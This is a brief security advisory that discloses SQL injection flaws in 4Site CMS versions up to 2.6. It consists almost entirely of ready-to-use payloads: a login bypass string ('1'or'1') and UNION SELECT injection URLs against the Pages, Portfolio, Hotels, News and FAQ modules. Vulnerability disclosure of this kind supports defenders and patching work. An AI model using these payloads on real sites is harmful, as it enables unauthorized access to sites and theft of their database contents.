[WSEC-09-002] 4Site CMS <= 2.6 Multiple Remote SQL Injections


Developer site: http://www.4site.ru/

Discovered by D.Mortalov // wsec.ru


1. Auth Bypass

Login: 1'or'1
Password: 1'or’1


2. Multiple Remote SQL Injections in 4site CMS modules

"Pages" module:
http://vulnerable.site/print/print.shtml?page=-1+union+select+1

"Portfolio" module:
http://vulnerable.site/portfolio/index.shtml?s=1&i=-1+union+select+1,2,3,4,5,6,7,8,9
http://vulnerable.site/portfolio/index.shtml?s=-1+union+select+1

"Hotels" module:
http://vulnerable.site/hotel/?h=-1+union+select+1

"News" module:
http://vulnerable.site/news/news1.shtml?id=-1+union+select+1,2,3,4

"FAQ" module:
http://vulnerable.site/faq/index.shtml?th=-1+union+select+1